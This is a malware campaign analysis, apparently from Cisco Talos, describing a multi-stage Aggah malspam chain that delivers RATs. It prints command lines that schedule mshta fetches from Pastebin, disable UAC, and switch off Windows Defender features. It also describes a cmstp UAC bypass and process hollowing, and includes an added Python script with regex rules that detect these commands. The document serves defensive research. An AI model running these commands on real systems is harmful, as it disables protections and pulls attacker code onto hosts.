- Cisco Talos has observed an upgraded version of a malspam campaign known to distribute multiple remote access trojans (RATs).
- The infection chain utilized in the attacks is highly modularized.
- The attackers utilize publicly available infrastructure such as Bitly and Pastebin (spread over a number of accounts) to direct and host their attack components.
- Network-based detection, although important, should be combined with endpoint protections to combat this threat and provide multiple layers of security.
Cisco Talos has observed a new Aggah campaign consisting of the distribution of malicious Microsoft Office documents (maldocs) via malicious spam (malspam) emails distributing a multi-stage infection to a target user’s endpoint.
The final payload of the infection consists of a variety of Remote-Access-Tool (RAT) families such as:
How did it work?
Many attackers and malware operators usually utilize their own infrastructure (or hacked domains) to act as delivery mechanisms for their infection chains. Consistent with previous Aggah campaigns, this campaign also focuses on the use of pastebin[.]com for all its infrastructure needs. However, this campaign now utilizes multiple Pastebin accounts to host different stages of the attack.
The key components of the attack are:
- Stage 1: Malspam delivering documents with malicious macros.
- Stage 2: Malicious VBScripts used to instrument the actual attack.
- Stage 2A: Malicious .NET-based binaries for disabling security features on the endpoint.
- Stage 3: Malicious VBScripts and .NET-based injectors and RATs (final payload).
The Aggah campaign has been quite prolific recently and the attackers have used their own infrastructure, as well as hosting sites such as Pastebin to host their infection components.
This new campaign, however, introduces a few key upgrades to the attack chain:
- Use of an additional .NET binary (and embedded VBScript and PowerShell scripts) to disable protection and detection mechanisms on the infected endpoint.
- Distribution of attack components (scripts and encoded MZs) across multiple free Pastebin accounts to modularize the attack infrastructure.
- Use of a new Pastebin PRO account to host all the final RAT payloads. This also indicates the move from the “hagga” to the “alphabets3” Pastebin account for continued operations (a pro account enables the attackers to modify the pastes and serve different malware at different points in time).
Initial infection vector
This threat arrives on the endpoint typically as a malicious email. The email attempts to appear legitimate while being vague at the same time. This is done to trick the target end-user into opening the malicious attachment (maldoc) that activates the infection on the endpoint.
A typical malspam email for this threat looks like:
Malicious document analysis
The maldocs distributed by this threat contain a simple and effective VB macro script that is used to download the next stage of the infection and execute it on the endpoint.
The maldocs themselves are essentially empty and contain minimal to no content in them.
Some examples of the names of the maldocs distributed by this threat:
- Items List.csv
- PO#422511 Hager.xls
- Purchase Order.xls
- Request for Quotation.xls
- RFQ Air Shipment.csv
- RFQ List #422513.csv
- RFQ List #422513..csv
- RFQ List #422513 t.csv
- Specification sheet and P.o 3053432.xls
Malicious VBA analysis
Once opened, the malicious VBA contacts a shortened “j.mp” URL (redirects to pastebin[.]com) that points to the next stage of the infection. The second stage of the infection (in fact all the subsequent stages) is hosted on Pastebin URLs.
Typical examples of the VB macro are:
Newer versions of the macro also aim to establish persistence via the Windows registry for the second-stage payload’s execution using mshta.
The persistence is set up in the registry key:
Infection Stage 2: Mshta script
The second-stage payload downloaded by the maldoc’s macro and executed using mshta is an escaped VBScript.
The second-stage payload carries out the following actions:
- Set up a malicious scheduled task for another component (the Stage 3 payload that activates the RAT) using the schtasks command, e.g.:
schtasks /create /sc MINUTE /mo 70 /tn <task_name> /tr ""mshta http://pastebin.com/raw/<resource_id>"" /F
- [Optional] Establish persistence for itself or another component (defined by another pastebin URL).
- Download a .NET executable for windows and execute it (payload stage 2A). This executable is designed to disable security features on the endpoint to evade detection.
Deobfuscated second-stage payload:
The entire infection chain is illustrated here for a better understanding of the highly modularized attack:
Infection Stage 2A: Elevate, evade, disable
This component is responsible for ensuring the seamless execution of the infection chain. It is implemented as a .NET-based executable that in turn executes an elevated VBScript to disable various protection mechanisms so that the chain can evade detection on the endpoint.
The executable extracts the VBS from its resources and dumps it into a randomly named VBS file. The executable also creates an ‘inf’ file that is then used to execute the malicious VBS using “cmstp” (cmstp.exe is used as a means of UAC bypass here).
Structure of the inf file:
To evade AV, the VBS takes the following actions:
- Ensure that the script is running with elevated privileges, else restart with elevated permissions.
- Disable UAC notifications by modifying registry value “EnableLUA” using command:
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- Disable Windows Defender features by running the PowerShell cmdlet “Set-MpPreference” with the arguments:
- -DisableRealtimeMonitoring $true
- -DisableBehaviorMonitoring $true
- -DisableBlockAtFirstSeen $true
- -DisableIOAVProtection $true
- -DisableScriptScanning $true
- -SubmitSamplesConsent 2
- -MAPSReporting 0
- -HighThreatDefaultAction 6 -Force
- -ModerateThreatDefaultAction 6
- -LowThreatDefaultAction 6
- -SevereThreatDefaultAction 6
- Use PowerShell to create process and path exclusions for Windows Defender scans for
A sample exclusions-enforcement script:
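The Stage 2 and Stage 2A behaviour described above (mshta fetching Pastebin raw pastes, schtasks persistence for mshta, cmstp executing an inf, reg.exe zeroing EnableLUA, Set-MpPreference disabling Defender features) all surfaces in process-creation command lines. The following added example, which is not code from the Talos post or the campaign, runs simple detection rules over constructed sample command lines; the sample lines, rule names and regexes are assumptions of the example, and in practice the input would be Sysmon event 1 or Security 4688 command-line fields.

```python
import re

# Constructed sample process-creation command lines (not real telemetry),
# modelled on the Stage 2 / Stage 2A behaviour described in the post.
SAMPLE_CMDLINES = [
    r'mshta http://pastebin.com/raw/AAAAAAAA',
    r'schtasks /create /sc MINUTE /mo 70 /tn Updater /tr "mshta http://pastebin.com/raw/BBBBBBBB" /F',
    r'cmstp.exe C:\Users\u\AppData\Local\Temp\xyz.inf',
    r'C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true',
    r'schtasks /query /tn Backup',          # benign: no /create, no mshta
    r'notepad.exe C:\Users\u\notes.txt',    # benign
]

# Each rule is (name, regex); names are hypothetical. Rules are ordered and
# classify() returns the matching names in this order.
RULES = [
    ("mshta_pastebin_raw",  r'\bmshta(?:\.exe)?\b.*https?://pastebin\.com/raw/'),
    ("schtasks_mshta",      r'\bschtasks(?:\.exe)?\b.*/create\b.*\bmshta\b'),
    ("cmstp_inf",           r'\bcmstp(?:\.exe)?\b.*\.inf\b'),
    ("enable_lua_disabled", r'\breg(?:\.exe)?\b.*\bEnableLUA\b.*/d\s+0\b'),
    ("defender_disabled",   r'Set-MpPreference\b.*-Disable\w+\s+\$true'),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, [rule names]) for each line that triggers at least one rule."""
    hits = []
    for line in cmdlines:
        names = classify(line)
        if names:
            hits.append((line, names))
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(", ".join(names), "<-", line)
```

Each rule on its own is noisy in some environments (schtasks and reg.exe are common admin tools); the value is in seeing several of them fire on one host within a short window, which is the pattern this chain produces.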
Infection Stage 3
This payload is a VBScript designed to instrument a .NET based injector component that activates a RAT payload (the final stage) on the infected endpoint.
A typical stage 3 payload looks like:
The infection/injection process works as follows:
- The Stage 3 payload VBScript downloads the injector instrumentation script from a Pastebin URL.
- The injector instrumentation script decompresses the injector binary (a .NET based DLL) and loads it into memory ready to be executed via an exported API of the DLL.
- The RAT payload is then downloaded and decoded.
- An API of the injector DLL is then called to inject the RAT payload into a specified benign process.
- The API accepts a benign executable’s name (such as “calc.exe”), spawns a new suspended process and uses process-hollowing to inject and activate the RAT payload on the infected endpoint.
This technique of decompressing the injector and subsequent injection of the final payload into a benign process using process-hollowing has been extensively used by the DarkComet malware family. As seen in this campaign (and other campaigns leveraging DarkComet), the injector component (DLL) is usually obfuscated to make analysis difficult.
Sub-component script that decompresses the injector module:
Final stage: RAT components
The final malware payloads served by such campaigns can vary from ransomware to RAT families. In the case of the campaign disclosed here, we have observed multiple families being distributed:
- Agent Tesla
- Nanocore RAT
The following pastebin accounts have been used to host malicious code for this campaign on Pastebin:
Out of all these accounts, the “alphabates3” account stands out specifically. This is a PRO account. A pro account enables the operator to modify the content of already created pastes. Also, this account hosts all the RAT payload samples discovered in this campaign so far. Thus it is highly likely that the attackers modify existing pastes to re-instrument infection chains to deliver different malware at different points in time.
The actors behind this campaign are clearly motivated and continue to operate leveraging freely available infrastructure such as Pastebin, Bitly (j[.]mp) and others. We have also observed a steady evolution in their tactics ranging from modularization of their attack chains to antivirus evasion tactics to thwart detections. The fact that these actors continue to distribute a wide variety of malware indicates that they are constantly growing their malware arsenal. The campaign started in January 2020 and is still ongoing. This campaign also shows us that while network-based detection is important, it must be complemented with system behavior analysis and endpoint protections.
Ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The following Snort SIDs were released to detect this threat: 53745 - 53748.
Cisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below:
Malicious Scripts and MZs: